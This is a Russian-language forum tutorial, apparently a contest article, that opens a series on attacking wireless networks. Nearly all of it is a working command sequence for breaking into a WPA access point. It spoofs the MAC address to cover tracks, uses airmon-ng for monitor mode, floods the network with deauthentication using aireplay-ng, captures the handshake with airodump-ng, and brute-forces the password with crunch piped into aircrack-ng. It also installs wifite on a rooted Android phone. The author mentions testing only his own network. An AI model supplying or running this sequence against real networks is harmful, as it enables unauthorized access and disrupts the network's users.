Статья для участия в конкурсе на codeby.
Приветствую всех дорогие форумчане. Я надеюсь вам понравится цикл моих статей по атакам на беспроводные сети.
Введение.
В этой и последующих частях мы будем проводить атаки на беспроводые сети( в моем случае я буду тестировать свою сеть). Также мы познакомимся с новыми фреймворками и различными утилитами для проведения данного рода атак.
В начале мы начнем с получения доступа к сети, то есть научимся осуществлять различные способы взлома точек доступа. Далее перейдем к атакам на самих пользователей сети, также попробуем получить полный контроль над сетью.
На этом описание закончено. Теперь перейдем к главному.
Взлом wifi.
Существует много способов получения доступа от тд(точка доступа):
- Похищение handshake(рукопожатие)
- Подбор wps ключа.
- Фишинг(и даже он)
В конце этой части также будет описан этот способ взлома, но только с использованием смартфона на базе android.
Шаг 1.
Перед началом взлома нужно позаботиться о своей безопасности. Давайте сменим свой MAC - адрес.
Узнаем интерфейс своей сетевой карты.
Код:
iwconfig
Как видем у меня это wlan0.
Далее прописываем 3 простенькие команды.
Код:
ifconfig wlan0 down # отключаем интерфейс
macchanger -r wlan0 # меняем mac
ifconfig wlan0 up # запускаем интерфейс
r - параметр устанавливающий рандомный MAC.
Все отлично. Мы сменили MAC
О безопасности мы позаботились, теперь неплохо бы начать.
Шаг 2.
Чтобы начать взлом необходимо перевести нашу сетевую карту в режим мониторинга. Это режим в котором мы сможем видеть большинство точек доступа которые нас окружают, мы можем видеть всю необходимую информацию которая нам понадобится в дальнейшем.
Код:
airmon-ng start wlan0
airmon-ng - это самый маленький пакет который используется для включения режима мониторинга(в частности).
Как видим теперь название нашего сетевого интерфейса сменилось на - wlan0mon.
Теперь необходимо убить процессы которые могут помешать нам.
Код:
kill 1091
kill 1239
Подготовка подошла к концу. Теперь начнется самое интересное.
Шаг 3.
Нам нужно узнать какие точки находятся вблизи нас.
Воспользуемся airodump-ng.
Вобще airodump - это инструмент для захвата пакетов.
Код:
airodump-ng wlan0mon
Что же мы получаем очень много информации.
(Для остановки сканирования просто зажмите CTRL+C)
Для начало обратим внимание на канал на котором "висит" ваша цель. Сейчас мы поступим таким образом:
Будем глушить сигнал сети и одновременно с этим сканировать сеть ожидая рукопожатие. Мы получаем его при деаудентификации пользователя сети.
Во первых. Открываем новое окно в терминале и пишем
Код:
iwconfig wlan0mon channel 10
Далее начнем глушить сигнал сети(атака wifi jammer)
Код:
aireplay-ng -0 0 -a <bssid> wlan0mon
BSSID - это своеобразный MAC точки доступа.
ESSID - это имя точки доступа.
a - параметр указывающий bssid
0 - параметр указывающий количество деаудентификаций пользователей.
Во вторых. Теперь попробуем получить рукопожатие(это долгий процесс).
Код:
airodump-ng --bssid <bssid> -w file wlan0mon
Ну вот мы и получили рукопожатие.
Теперь осталось "выбить из него все ценное".
Шаг 4.
Для получения пароля вместо использования баз паролей мы просто подключим crunch к aircrack по тунелю. Но нам нужно будет предполагать возможную длину пароля. Мы знаем что возможная минимальная длина это 8 символов. Допустим это и есть длина . Тогда вся наша конструкция будет выглядеть так
Код:
crunch 8 8 abcdefghijklmnopqrstuvwxyz1234567890.-_ | aircrack-ng -w - file.cap -b <bssid>
Надоже, все сработало успешно. Но все таки мы не можем точно знать из чего состоит пароль, его длинну, присутствуют ли различия регистра и.т.п.
Взлом с android.
Нам понадобится рутированый андроид. Если у вас нет root прав, то обязательно рутируйте.
Что же, теперь идем в play market и скачиваем Termux.
После установки Termux осталось опять же установить на него wifite.
Код:
1. apt update && apt upgrade
2. apt install git && apt install python -y
3. git clone https://github.com/derv82/wifite
4. cd wifite
5. chmod +x wifite.py
6. ./wifite.py
Об использовании wifite я расскажу в следующей части.
На этом первая часть подошла к концу!